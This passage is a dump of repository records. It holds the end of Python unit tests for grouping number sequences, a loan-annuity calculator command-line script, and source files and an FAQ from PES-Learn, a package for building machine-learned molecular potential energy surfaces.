1])\n\n def test_deve_retornar_o_ultimo_da_sequencia_de_n_numeros(self):\n self.assertEqual(sequence_ends(range(100, 105 + 1)), [105, 5])\n\n def test_deve_retornar_o_ultimo_da_primeira_sequencia_de_2_sequencias_proximas(self):\n self.assertEqual(sequence_ends(\n list(range(100, 105 + 1)) + list(range(107, 110 + 1))), [105, 5])\n\n def test_deve_retornar_o_ultimo_da_primeira_sequencia_de_2_sequencias_distantes(self):\n self.assertEqual(sequence_ends(\n list(range(100, 105 + 1)) + list(range(200, 205 + 1))), [105, 5])\n\n\nclass TestSplitSequences(unittest.TestCase):\n def test_deve_retornar_uma_lista_com_uma_lista_de_sequencia(self):\n self.assertEqual(group_sequences(\n list(range(10, 20 + 1))), [[10, 20]])\n\n def test_deve_retornar_uma_lista_com_duas_listas_de_sequencia(self):\n self.assertEqual(\n group_sequences(list(range(10, 20 + 1)) + list(range(22, 32 + 1))),\n [[10, 20], [22, 32]])\n\n def test_deve_retornar_uma_lista_com_uma_lista_de_sequencia_e_um_numero(self):\n self.assertEqual(\n group_sequences(list(range(10, 20 + 1)) + [22]),\n [[10, 20], [22]])\n\n def test_deve_retornar_uma_lista_com_duas_listas_de_um_numero(self):\n self.assertEqual(\n group_sequences([20, 22]),\n [[20], [22]])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group_sequences(list(range(100, 150 + 1)) +\n [170]), [[100, 150], [170]])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group_sequences(list(range(100, 150 + 1)) +\n [70]), [[100, 150], [70]])\n\n\nclass TestFindSequences(unittest.TestCase):\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(find_sequences(list(range(100, 150 + 1)) +\n [170]), [[100, 150], [170]])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero_repetido(self):\n self.assertEqual(find_sequences(list(range(100, 150 + 1)) +\n [70]), [[70], [100, 150]])\n" } ]
5
Ed-Mwaura/annuity_calculator-CLI-VERSION---hs
https://github.com/Ed-Mwaura/annuity_calculator-CLI-VERSION---hs
250307fe9ca0b740125aa19e734b5ec38ea532af
7fc29825845449ad483b6ef128fd3a25bf291aba
da48c0eb66a4aaad45f0eee8a498b679c258a1f9
refs/heads/master
2022-11-06T15:36:02.803428
2020-06-26T19:35:03
2020-06-26T19:35:03
275,232,664
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5782697200775146, "alphanum_fraction": 0.5877569317817688, "avg_line_length": 33.5859375, "blob_id": "7b75b84bc987b2675df35082f3d30cb1ae6a3c1e", "content_id": "a03bf11652c0a43fda97ec8be129b6009f3bb654", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4427, "license_type": "no_license", "max_line_length": 98, "num_lines": 128, "path": "/calculator_cli.py", "repo_name": "Ed-Mwaura/annuity_calculator-CLI-VERSION---hs", "src_encoding": "UTF-8", "text": "import math\nimport argparse\nimport sys\n\n\nclass Calculator:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--type\", help=\"type of calculation\", choices=[\"diff\", \"annuity\"])\n\n parser.add_argument(\"--principal\", help=\"credit principal\", type=int)\n\n parser.add_argument(\"--payment\", help=\"monthly payments\", type=float)\n\n parser.add_argument(\"--interest\", help=\"interest\", type=float)\n\n parser.add_argument(\"--periods\", help=\"monthly periods\", type=int)\n\n args = parser.parse_args()\n\n def calculate_months(self):\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n\n credit_p = self.args.principal\n m_payment = self.args.payment\n\n log_base = m_payment / (m_payment - nominal_interest * credit_p)\n\n n_months = math.ceil(math.log(log_base, (1 + nominal_interest)))\n\n overpayment = math.ceil(n_months * m_payment - credit_p)\n\n if n_months % 12 == 0:\n n_years = n_months // 12\n\n if n_years == 1:\n print(f'You need {n_years} year to repay this credit')\n else:\n print(f'You need {n_years} years to repay this credit!')\n else:\n n_years = n_months // 12\n n_rem_months = n_months % 12\n\n if n_years == 0:\n print(f'You need {n_rem_months} months to repay this credit!')\n elif n_years == 1:\n print(f'You need {n_years} year and {n_rem_months} months to repay this credit!')\n else:\n print(f'You need {n_years} years and {n_rem_months} months to repay this credit!')\n\n print(f'Overpayment = {overpayment}')\n\n def calculate_monthly_payments(self):\n\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n credit_p = self.args.principal\n c_periods = self.args.periods\n\n denominator = math.pow(1 + nominal_interest, c_periods) - 1\n numerator = nominal_interest * math.pow(1 + nominal_interest, c_periods)\n annuity_payment = math.ceil(credit_p * (numerator / denominator))\n\n overpayment = annuity_payment * c_periods - credit_p\n\n print(f'Your annuity payment = {annuity_payment}!')\n print(f'Overpayment = {overpayment}')\n\n def calculate_differential_payments(self):\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n credit_p = self.args.principal\n c_periods = self.args.periods\n\n total_sum = 0\n # start with 1 and end with total + 1; calculations start after the month is over\n # but python is zero indexed\n for i in range(1, c_periods + 1):\n inner_fraction = (credit_p * (i - 1)) / c_periods\n bracket_data = credit_p - inner_fraction\n total_calc = math.ceil(credit_p / c_periods + nominal_interest * bracket_data)\n\n total_sum += total_calc\n\n print(f'month {i}: paid out {total_calc}')\n overpayment = total_sum - credit_p\n print()\n print(f'Overpayment = {overpayment}')\n\n def calculate_principal(self):\n\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n\n c_periods = self.args.periods\n m_payment = self.args.payment\n\n denominator_min = math.pow(1 + nominal_interest, c_periods) - 1\n numerator_min = nominal_interest * math.pow(1 + nominal_interest, c_periods)\n denominator = numerator_min / denominator_min\n\n credit_principal = round(m_payment / denominator)\n\n overpayment = m_payment * c_periods - credit_principal\n\n print(f'Your credit principal = {credit_principal}!')\n print(f'Overpayment = {overpayment}')\n\n def intro(self):\n if len(sys.argv) != 5:\n print(\"Incorrect parameters!\")\n else:\n if self.args.type == 'diff':\n if self.args.payment is not None:\n print(\"Incorrect parameters!\")\n else:\n self.calculate_differential_payments()\n elif self.args.type == 'annuity':\n if self.args.payment is None:\n self.calculate_monthly_payments()\n elif self.args.principal is None:\n self.calculate_principal()\n elif self.args.periods is None:\n self.calculate_months()\n\n\ncalc = Calculator()\ncalc.intro()\n" } ]
1
zero0911/PES-Learn
https://github.com/zero0911/PES-Learn
1ef0abd0dd871d3dbfc0c5a4a1b42d9946eb9dfb
7a956db1aff368f978dd3c5c08ef99aec2613d53
b42c07de03087e6fccad127edd560bfcf7da834f
refs/heads/master
2023-02-03T07:39:12.075839
2020-11-06T05:49:25
2020-11-06T05:49:25
309,278,630
2
0
BSD-3-Clause
2020-11-02T06:31:51
2020-11-06T03:11:09
2020-11-06T05:49:25
Python
[ { "alpha_fraction": 0.7598101496696472, "alphanum_fraction": 0.7706910371780396, "avg_line_length": 161.96226501464844, "blob_id": "2dcc87f016bf2aba0f67da46daf89c99e741a82e", "content_id": "ac58abb31f595fc8c8c247d5955518438d554199", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8639, "license_type": "permissive", "max_line_length": 1230, "num_lines": 53, "path": "/2_FAQ/FAQ.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn usage FAQ\n\n## 1. How to install PES-Learn...\n * from source?\n * In a command line environment on Linux, OSX, or [Windows 10 Subsystem for Linux](https://docs.microsoft.com/en-us/windows/wsl/install-win10): \n * `git clone https://github.com/CCQC/PES-Learn.git`\n * `cd PES-Learn`\n * `python setup.py install`\n * `pip install -e .`\n * with pip?\n * _coming soon_\n * with conda?\n * _coming soon_\n\n## 2. How do I use PES-Learn?\n * The code can be used in two formats, either with an input file `input.dat` or with the Python API. See Tutorials section for examples. If an input file is created, one just needs to run `python path/to/PES-Learn/peslearn/driver.py` while in the directory containing the input file. To use the Python API, create a python file which imports peslearn `import peslearn`. This requires the package to be in your Python path: `export PYTHONPATH=\"absolute/path/to/directory/containing/peslearn\"`. This can be executed on the command line or added to your shell intializer (e.g. `.bashrc`) for more permanent access. \n \n## 3. Why is data generation so slow?\n * First off, the data generation code performance was improved 100-fold in [this pull request](https://github.com/CCQC/PES-Learn/pull/20), July 17th, 2019. Update to this version if data generation is slow. Also, if one is generating a lot of points (1-10 million) one can expect slow performance when using `grid_reduction = x` for large values of x (20,000-100,000). Multiplying the grid increments together gives the total number of points, so if there are 6 geometry parameters with 10 increments each thats 10^6 internal coordinate configurations. If you are **not** removing redundancies (`remove_redundancy=false`) and reducing the grid size to some value (e.g. `grid_reduction=1000`) it is recommended to only generate tens of thousands of points at a time. This is because writing many directories/files can be quite expensive. If you are removing redundancies and/or filtering geometries, it is not recommended to generate more than a few million internal coordinate configurations. Finally, the algorithm behind `remember_redundancies=true` and `grid_reduction = 10000` can be slow in some circumstances.\n \n## 4. Why is my machine learning model so bad?\n * 95% of the time it means your dataset sucks. Open the dataset and look at the energies. If it is a PES-Learn-generated dataset, the energies are in increasing order by default (can be disabled with `sort_pes=false`.) Scrolling through the dataset, the energies should be smoothly increasing. If there are large jumps in the energy values (typcially towards the end of the file) these points are probably best deleted. If the dataset looks good, the ML algorithm probably just needs more training points in order to model the dimensionality and features of the surface. Either that, or PES-Learn's automated ML model optimization routines are just not working for your use case.\n \n## 5. Why is training ML models so slow?\n * A few things you can do:\n * Train over less hyperparameter optimization iterations\n * Ensure multiple cores/threads are being used by your CPU. This can be done by checking which BLAS library NumPy is using:\n * Open an interactive python session with `python` and then `import numpy as np` followed by `np.show_config()`. If this displays a bunch of references to `mkl`, then NumPy is using Intel MKL. If this displays a bunch of references to 'openblas' then Numpy is using OpenBLAS. If Numpy is using MKL, you can control CPU usage with the environment variable MKL_NUM_THREADS=4 or however many physical cores your CPU has (this is recommended by Intel; do not use hyperthreading). If Numpy is using OpenBLAS, you can control CPU usage with OMP_NUM_THREADS=8 or however many threads are available. In bash, environment variables can be set by typing `export OMP_NUM_THREADS=8` into the terminal. Note that instabilities such as memory leaks due to thread-overallocation can occur if _both_ of these environment variables are set depending on your configuration (i.e., if one is set to 4 or 8 or whatever, make sure to set the other to =1).\n * Use an appropriate number of training points for the ML algorithm.\n * Gaussian processes scale poorly with the number of training points. Any more than 1000-2000 is unreasonable on a personal computer. If submitting to some external computing resource, anything less than 5000 or so is reasonable. Use neural networks for large training sets. If it is still way too slow, you can try to constrain the neural networks to use the Adam optimizer instead of the BFGS optimizer. \n \n \n## 6. How do I use this machine learning model?\n * When a model is finished training PES-Learn exports a folder `model1_data` which contains a bunch of stuff including a Python code `compute_energy.py` with convenience function `pes()` for evaluating energies with the ML model. Directions for use are written directly into the `compute_energy.py` file. The convenience function can be imported into other Python codes that are in the same directory with `from compute_energy import pes`. This is also in principle accessible from codes written in other programming languages such as C, C++ through their respective Python APIs, though these can be tricky to use.\n \n## 7. What are all these Hyperparameters?\n * `scale_X` is how each individual input (geometry parameter) is scaled. `scale_y` is how the energies (outputs) are scaled. \n * `std` is standard scaling, each column of data is scaled to a mean of 0 and variance of 1. \n * `mm01` is minmax scaling, each column of data is scaled such that it runs from 0 to 1\n * `mm11` is minmax scaling with a range -1 to 1\n * `morse` is whether interatomic distances are transformed into morse variables $r_1 \\rightarrow e^{r_1/\\alpha}$\n * `pip` stands for permutation invariant polynomials; i.e. the geometries are being transformed into a permutation invariant representation using the fundamental invariants library. \n * `degree_reduce` is when each fundamental invariant polynomial result is taken to the $1/n$ power where $n$ is the degree of the polynomial\n * `layers` is a list of the number of nodes in each hidden layer of the neural network\n\n## 8. How many points do I need to generate?\n\n * It's very hard to say what size of training set is required for a given target accuracy; it depends on a lot of things. First, the application: if you are doing some variational computation of the vibrational energy levels and only want the fundamentals, you might be able to get away with less points because you really just need a good description of the surface around the minimum. If one wants high-lying vibrational states with VCI, the surface needs a lot more coverage, and therefore more points. If the application involves a reactive potential energy surface across several stationary points, even more points are needed. The structure of the surface itself can also influence the number of points needed.\n**You don't know until you try.** For a given system, one should try out a few internal coordinate grids, reduce them to some size with `grid_reduction`, compute the points at a low level of theory, and see how well the models perform. This process can be automated with the Python API.\n\n## 9. How big can the molecular system be? \n\n * No more than 5-6 atoms for 'full' PESs. Any larger than that, and generating data by displacing in internal coordinates is impractical (if you have 6 atoms and want 5 increments along each internal coordinate, that's already ~240 million points). This is just an unfortunate reality of high-dimensional spaces: ample coverage over each coordinate and all possible coordinate displacement couplings requires an impossibly large grid of points for meaningful results. **One can still do large systems if they only scan over some of the coordinates.** For example, you can do relaxed scans across the surface, fixing just a few internal coordinates and relaxing all others through geometry optimization at each point, and creating a model of this 'sub-manifold' of the surface is no problem (i.e., train on the fixed coordinate parameters and 'learn' the relaxed energies). This is useful for inspecting reaction coordinates/reaction entrance channels, for example. Future releases will support including gradient information in training the model, and this may allow for slightly larger systems and smaller dataset sizes. In theory, gradients can give the models more indication of the curvature of the surface with less points.\n\n\n" }, { "alpha_fraction": 0.682539701461792, "alphanum_fraction": 0.682539701461792, "avg_line_length": 30, "blob_id": "bb70ece779bea7fb7c414f3fb4cbe52c9eeb25f5", "content_id": "3d599f7574947c130275fdf95c9d70bd4be5f602", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63, "license_type": "permissive", "max_line_length": 51, "num_lines": 2, "path": "/peslearn/lib/path.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import os\nfi_dir = os.path.dirname(os.path.abspath(__file__)) \n" }, { "alpha_fraction": 0.5908715724945068, "alphanum_fraction": 0.6018697023391724, "avg_line_length": 33.590476989746094, "blob_id": "47c191cb6ada5c74667bc3b977c91adbfa4c41db", "content_id": "2dd73be300c541cd8be7b66aba3c0ea85f0ee843", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3637, "license_type": "permissive", "max_line_length": 117, "num_lines": 105, "path": "/peslearn/ml/preprocessing_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nimport re\n\n\ndef general_scaler(scale_type, data):\n \"\"\"\n Scales each column of an array according to scale_type\n \"\"\"\n if scale_type == 'std':\n scaler = StandardScaler()\n new_data = scaler.fit_transform(data)\n if scale_type == 'mm01':\n scaler = MinMaxScaler(feature_range=(0,1))\n new_data = scaler.fit_transform(data)\n if scale_type == 'mm11':\n scaler = MinMaxScaler(feature_range=(-1,1))\n new_data = scaler.fit_transform(data)\n return new_data, scaler\n\ndef morse(raw_X, alpha=1.00):\n \"\"\"\n Element-wise morse variable transformation on an array of interatom distances\n r_morse = exp(-r/alpha)\n Assumes units of Angstroms \n \"\"\"\n return np.exp(-raw_X / alpha)\n\ndef interatomics_to_fundinvar(raw_X, fi_path):\n \"\"\"\n Transfrom interatom distances to fundamental invariants \n Parameters\n ---------\n raw_X : array \n Array of interatomic distances in Standard Order: \n r1\n r2 r3\n r4 r5 r6...\n where the order of atoms along columns/rows of interatomic distance matrix \n is determined by highest frequency atoms first, alphabetical tiebreaker) \n e.g. HCOOH would be ordered as HHOOC\n fi_path : str\n Path to Singular outputfile containing Fundamental Invariants\n \"\"\"\n nbonds = raw_X.shape[1]\n with open(fi_path, 'r') as f:\n data = f.read()\n data = re.sub('\\^', '**', data)\n # convert subscripts of bonds to 0 indexing\n for i in range(1, nbonds+1):\n data = re.sub('x{}(\\D)'.format(str(i)), 'x{}\\\\1'.format(i-1), data)\n\n polys = re.findall(\"\\]=(.+)\",data)\n\n # create a new_X matrix that is the shape of number geoms, number of Fundamental Invariants\n new_X = np.zeros((raw_X.shape[0],len(polys)))\n for i, p in enumerate(polys): # evaluate each FI \n # convert the FI to a python expression of raw_X, e.g. x1 + x2 becomes raw_X[:,1] + raw_X[:,2]\n eval_string = re.sub(r\"(x)(\\d+)\", r\"raw_X[:,\\2]\", p)\n # evaluate that column's FI from columns of raw_X\n new_X[:,i] = eval(eval_string)\n\n # find degree of each FI\n degrees = []\n for p in polys:\n # just checking first, assumes every term in each FI polynomial has the same degree (seems to always be true)\n tmp = p.split('+')[0]\n # count number of exponents and number of occurances of character 'x'\n exps = [int(i) - 1 for i in re.findall(\"\\*\\*(\\d+)\", tmp)]\n ndegrees = len(re.findall(\"x\", tmp)) + sum(exps)\n degrees.append(ndegrees)\n\n return new_X, degrees\n\ndef degree_reduce(raw_X, degrees):\n \"\"\"\n Take every fundamental invariant f and raise to f^(1/m) where m is degree of f\n \"\"\"\n for i, degree in enumerate(degrees):\n raw_X[:,i] = np.power(raw_X[:,i], 1/degree)\n return raw_X\n\ndef sort_architectures(layers, inp_dim):\n \"\"\"\n Takes a list of hidden layer tuples (n,n,n...) and input dimension size and\n sorts it by the number of expected weights in the neural network\n \"\"\"\n out_dim = 1\n sizes = []\n for struct in layers:\n size = 0\n idx = 0\n size += inp_dim * struct[idx]\n idx += 1\n n = len(struct)\n while idx < n:\n size += struct[idx - 1] * struct[idx]\n idx += 1\n size += out_dim * struct[-1]\n sizes.append(size)\n sorted_indices = np.argsort(sizes).tolist()\n layers = np.asarray(layers)\n layers = layers[sorted_indices].tolist()\n return layers\n\n\n\n\n\n" }, { "alpha_fraction": 0.6277768015861511, "alphanum_fraction": 0.6691349148750305, "avg_line_length": 42.56692886352539, "blob_id": "2a52490f329adf8d1186e973e032a36714cd112a", "content_id": "1eb1962eeb41f8a1335d712acf543872d9ecc437", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5537, "license_type": "permissive", "max_line_length": 180, "num_lines": 127, "path": "/peslearn/constants.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\n\n# some constants used in the code\nrad2deg = 180.0 / np.pi\ndeg2rad = np.pi / 180.0\n\nbohr2angstroms = 0.52917720859\nhartree2ev = 27.21138505\nhartree2cm = 219474.63 \n\n#PES-Learn package absolute path (used for accessing FI library)\npackage_directory = os.path.dirname(os.path.abspath(__file__)) \n\n# Gaussian process convenience function writer \ngp_convenience_function = \"\"\"\n# How to use 'compute_energy()' function\n# --------------------------------------\n# E = compute_energy(geom_vectors, cartesian=bool)\n# 'geom_vectors' is either: \n# 1. A list or tuple of coordinates for a single geometry. \n# 2. A column vector of one or more sets of 1d coordinate vectors as a list of lists or 2D NumPy array:\n# [[ coord1, coord2, ..., coordn],\n# [ coord1, coord2, ..., coordn],\n# : : : ], \n# [ coord1, coord2, ..., coordn]]\n# In all cases, coordinates should be supplied in the exact same format and exact same order the model was trained on.\n# If the coordinates format used to train the model was interatomic distances, each set of coordinates should be a 1d array of either interatom distances or cartesian coordinates. \n# If cartesian coordinates are supplied, cartesian=True should be passed and it will convert them to interatomic distances. \n# The order of coordinates matters. If PES-Learn datasets were used they should be in standard order;\n# i.e. cartesians should be supplied in the order x,y,z of most common atoms first, with alphabetical tiebreaker. \n# e.g., C2H3O2 --> H1x H1y H1z H2x H2y H2z H3x H3y H3z C1x C1y C1z C2x C2y C2z O1x O1y O1z O2x O2y O2z\n# and interatom distances should be the row-wise order of the lower triangle of the interatom distance matrix, with standard order atom axes:\n# H H H C C O O \n# H \n# H 1\n# H 2 3\n# C 4 5 6 \n# C 7 8 9 10 \n# O 11 12 13 14 15\n# O 16 17 18 19 20 21\n\n# The returned energy array is a column vector of corresponding energies. Elements can be accessed with E[0,0], E[0,1], E[0,2]\n# NOTE: Sending multiple geometries through at once is much faster than a loop of sending single geometries through.\n\ndef pes(geom_vectors, cartesian=True):\n g = np.asarray(geom_vectors)\n if cartesian:\n axis = 1\n if len(g.shape) < 2:\n axis = 0\n g = np.apply_along_axis(cart1d_to_distances1d, axis, g)\n newX = gp.transform_new_X(g, params, Xscaler)\n E, cov = final.predict(newX, full_cov=False)\n e = gp.inverse_transform_new_y(E,yscaler)\n #e = e - (insert min energy here)\n #e *= 219474.63 ( convert units )\n return e\n\ndef cart1d_to_distances1d(vec):\n vec = vec.reshape(-1,3)\n n = len(vec)\n distance_matrix = np.zeros((n,n))\n for i,j in combinations(range(len(vec)),2):\n R = np.linalg.norm(vec[i]-vec[j])\n distance_matrix[j,i] = R\n distance_vector = distance_matrix[np.tril_indices(len(distance_matrix),-1)]\n return distance_vector\n\"\"\" \n\n\nnn_convenience_function = \"\"\"\n# How to use 'compute_energy()' function\n# --------------------------------------\n# E = compute_energy(geom_vectors, cartesian=bool)\n# 'geom_vectors' is either: \n# 1. A list or tuple of coordinates for a single geometry. \n# 2. A column vector of one or more sets of 1d coordinate vectors as a list of lists or 2D NumPy array:\n# [[ coord1, coord2, ..., coordn],\n# [ coord1, coord2, ..., coordn],\n# : : : ], \n# [ coord1, coord2, ..., coordn]]\n# In all cases, coordinates should be supplied in the exact same format and exact same order the model was trained on.\n# If the coordinates format used to train the model was interatomic distances, each set of coordinates should be a 1d array of either interatom distances or cartesian coordinates. \n# If cartesian coordinates are supplied, cartesian=True should be passed and it will convert them to interatomic distances. \n# The order of coordinates matters. If PES-Learn datasets were used they should be in standard order;\n# i.e. cartesians should be supplied in the order x,y,z of most common atoms first, with alphabetical tiebreaker. \n# e.g., C2H3O2 --> H1x H1y H1z H2x H2y H2z H3x H3y H3z C1x C1y C1z C2x C2y C2z O1x O1y O1z O2x O2y O2z\n# and interatom distances should be the row-wise order of the lower triangle of the interatom distance matrix, with standard order atom axes:\n# H H H C C O O \n# H \n# H 1\n# H 2 3\n# C 4 5 6 \n# C 7 8 9 10 \n# O 11 12 13 14 15\n# O 16 17 18 19 20 21\n\n# The returned energy array is a column vector of corresponding energies. Elements can be accessed with E[0,0], E[0,1], E[0,2]\n# NOTE: Sending multiple geometries through at once is much faster than a loop of sending single geometries through.\n\ndef pes(geom_vectors, cartesian=True):\n g = np.asarray(geom_vectors)\n if cartesian:\n axis = 1\n if len(g.shape) < 2:\n axis = 0\n g = np.apply_along_axis(cart1d_to_distances1d, axis, g)\n newX = nn.transform_new_X(g, params, Xscaler)\n x = torch.tensor(data=newX)\n with torch.no_grad():\n E = model(x)\n e = nn.inverse_transform_new_y(E, yscaler)\n #e = e - (insert min energy here)\n #e *= 219474.63 ( convert units )\n return e\n\ndef cart1d_to_distances1d(vec):\n vec = vec.reshape(-1,3)\n n = len(vec)\n distance_matrix = np.zeros((n,n))\n for i,j in combinations(range(len(vec)),2):\n R = np.linalg.norm(vec[i]-vec[j])\n distance_matrix[j,i] = R\n distance_vector = distance_matrix[np.tril_indices(len(distance_matrix),-1)]\n return distance_vector\n\"\"\" \n" }, { "alpha_fraction": 0.6189812421798706, "alphanum_fraction": 0.6270542740821838, "avg_line_length": 55.39566421508789, "blob_id": "cae25492047b8265baff156e982bc330de7a1bc4", "content_id": "687eba6481e35e0d109be033a9517713c1af7804", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20810, "license_type": "permissive", "max_line_length": 173, "num_lines": 369, "path": "/peslearn/datagen/configuration_space.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nA class for building PES geometries \n\"\"\"\nfrom ..utils import geometry_transform_helper as gth\nfrom ..utils import permutation_helper as ph\nfrom ..ml.data_sampler import DataSampler \n\nfrom collections import OrderedDict\nimport gc\nimport os\nimport json\nimport timeit\nimport pandas as pd\nimport numpy as np\npd.set_option('display.width',200)\npd.set_option('display.max_colwidth',200)\npd.set_option('display.max_columns',200)\npd.set_option('display.max_rows',1000)\n\nclass ConfigurationSpace(object):\n \"\"\"\n Class for generating PES geometries, removing redundancies, reducing grid size.\n\n Parameters\n ----------\n molecule_obj : :class:`~peslearn.datagen.molecule.Molecule`. \n Instance of PES-Learn Molecule class. Required for basic information about the molecule; \n internal coordinates, xyz coordinates, number of atoms.\n input_obj : :class:`~peslearn.input_processor.InputProcessor`\n Instance of InputProcessor class. Required for user keyword considerations.\n \"\"\"\n def __init__(self, molecule_obj, input_obj):\n self.mol = molecule_obj\n self.input_obj = input_obj\n self.n_atoms = self.mol.n_atoms - self.mol.n_dummy\n self.n_interatomics = int(0.5 * (self.n_atoms * self.n_atoms - self.n_atoms))\n self.bond_columns = []\n for i in range(self.n_interatomics):\n self.bond_columns.append(\"r%d\" % (i))\n\n def generate_displacements(self):\n \"\"\"\n Generates internal coordinate displacements according to internal coordinate ranges.\n \"\"\"\n start = timeit.default_timer()\n self.input_obj.extract_intcos_ranges()\n d = self.input_obj.intcos_ranges\n for key, value in d.items():\n if len(value) == 3:\n d[key] = np.linspace(value[0], value[1], value[2])\n elif len(value) == 1:\n d[key] = np.asarray(value[0]) \n else:\n raise Exception(\"Internal coordinate range improperly specified\")\n grid = np.meshgrid(*d.values())\n # 2d array (ngridpoints x ndim) each row is one datapoint\n intcos = np.vstack(map(np.ravel, grid)).T\n print(\"{} internal coordinate displacements generated in {} seconds\".format(intcos.shape[0], round((timeit.default_timer() - start),3)))\n return intcos\n\n def generate_geometries(self):\n \"\"\"\n Generates internal coordinates, converts them to Cartesians, and converts them to interatomic distances.\n Stores them into a Pandas DataFrame with columns ['r0', 'r1', 'r2', 'r3', ..., 'rn', 'cartesians', 'internals']\n Where each row of 'cartesians' contain 2d NumPy arrays and 'internals' contain 1d NumPy arrays.\n \"\"\"\n t1 = timeit.default_timer()\n intcos = self.generate_displacements()\n eq = self.input_obj.keywords['eq_geom']\n if eq:\n intcos = np.vstack((np.array(eq), intcos))\n self.n_disps = intcos.shape[0]\n # Make NumPy array of complete internal coordinates, including dummy atoms (values only). \n # If internal coordinates have duplicate entries, a different, slightly slower method is needed; the internal coordinates\n # must be expanded to their redundant full definition before Cartesian coordinate conversion\n if self.mol.unique_geom_parameters != self.mol.geom_parameters:\n indices = []\n for p1 in self.mol.geom_parameters:\n for i, p2 in enumerate(self.mol.unique_geom_parameters):\n if p1==p2:\n indices.append(i)\n intcos = intcos[:, np.array(indices)]\n\n # Make NumPy array of cartesian coordinates \n cartesians = gth.vectorized_zmat2xyz(intcos, self.mol.zmat_indices, self.mol.std_order_permutation_vector, self.mol.n_atoms)\n print(\"Cartesian coordinates generated in {} seconds\".format(round((timeit.default_timer() - t1), 3)))\n t2 = timeit.default_timer()\n # Find invalid Cartesian coordinates which were constructed with invalid Z-Matrices (3 Co-linear atoms)\n colinear_atoms_bool = np.isnan(cartesians).any(axis=(1,2))\n n_colinear = np.where(colinear_atoms_bool)[0].shape[0]\n if n_colinear > 0:\n print(\"Warning: {} configurations had invalid Z-Matrices with 3 co-linear atoms, tossing them out! Use a dummy atom to prevent.\".format(n_colinear))\n # Remove bad Z-Matrix geometries\n cartesians = cartesians[~colinear_atoms_bool]\n intcos = intcos[~colinear_atoms_bool]\n # Pre-allocate memory for interatomic distances array\n interatomics = np.zeros((cartesians.shape[0], self.n_interatomics))\n for atom in range(1, self.n_atoms):\n # Create an array of duplicated cartesian coordinates of this particular atom, for every geometry, which is the same shape as 'cartesians'\n tmp1 = np.broadcast_to(cartesians[:,atom,:], (cartesians.shape[0], 3))\n tmp2 = np.tile(tmp1, (self.n_atoms,1,1)).transpose(1,0,2)\n # Take the non-redundant norms of this atom to all atoms after it in cartesian array\n diff = tmp2[:, 0:atom,:] - cartesians[:, 0:atom,:]\n norms = np.sqrt(np.einsum('...ij,...ij->...i', diff , diff))\n # Fill in the norms into interatomic distances 2d array , n_interatomic_distances)\n if atom == 1:\n idx1, idx2 = 0, 1\n if atom > 1:\n x = int((atom**2 - atom) / 2)\n idx1, idx2 = x, x + atom\n interatomics[:, idx1:idx2] = norms \n print(\"Interatomic distances generated in {} seconds\".format(round((timeit.default_timer() - t2), 3)))\n # Round all coordinates for nicer printing and redundancy removal.\n intcos.round(10)\n interatomics.round(10)\n cartesians.round(10)\n self.n_disps = cartesians.shape[0]\n # Build DataFrame of all geometries \n self.all_geometries = pd.DataFrame(index=np.arange(0, cartesians.shape[0]), columns=self.bond_columns)\n self.all_geometries[self.bond_columns] = interatomics\n self.all_geometries['cartesians'] = [cartesians[i,:,:] for i in range(self.n_disps)]\n self.all_geometries['internals'] = [intcos[i,:] for i in range(self.n_disps)]\n print(\"Geometry grid generated in {} seconds\".format(round((timeit.default_timer() - t1),3)))\n return self.all_geometries\n # Memory is expensive to evaluate\n #print(\"Peak memory usage estimate (GB): \", 3*(self.all_geometries.memory_usage(deep=True).sum() + cartesians.nbytes + interatomics.nbytes + intcos.nbytes)* (1/1e9))\n\n def remove_redundancies(self):\n \"\"\"\n Very fast algorithm for removing redundant geometries from a configuration space\n Has been confirmed to work for C3H2, H2CO, H2O, CH4, C2H2 \n Not proven.\n \"\"\"\n start = timeit.default_timer()\n nrows_before = len(self.all_geometries.index)\n df = self.all_geometries.copy()\n df = df.round(10)\n og_cols = df.columns.tolist()\n # sort interatomic distance columns according to alphabetized bond types\n # e.g. OH HH CH --> CH HH OH\n alpha_bond_cols = [og_cols[i] for i in self.mol.alpha_bond_types_indices]\n alpha_bond_cols.append('cartesians')\n alpha_bond_cols.append('internals')\n df = df[alpha_bond_cols]\n df_cols = df.columns.tolist()\n # sort values of each 'bondtype' subpartition of interatomic distance columns\n # subpartitions are defined by the index of the first occurance of each \n # bond_type label. CH CH CH HH HH OH would be [0,3,5]. These define partition bounds.\n ind = self.mol.alpha_bond_types_first_occur_indices\n K = len(ind)\n # sort each subpartition\n for i in range(K):\n if i < (K - 1):\n cut = slice(ind[i], ind[i+1])\n mask = df_cols[cut]\n df.loc[:,mask] = np.sort(df.loc[:,mask].values, axis=1)\n else:\n mask = df_cols[i:self.n_interatomics]\n df.loc[:,mask] = 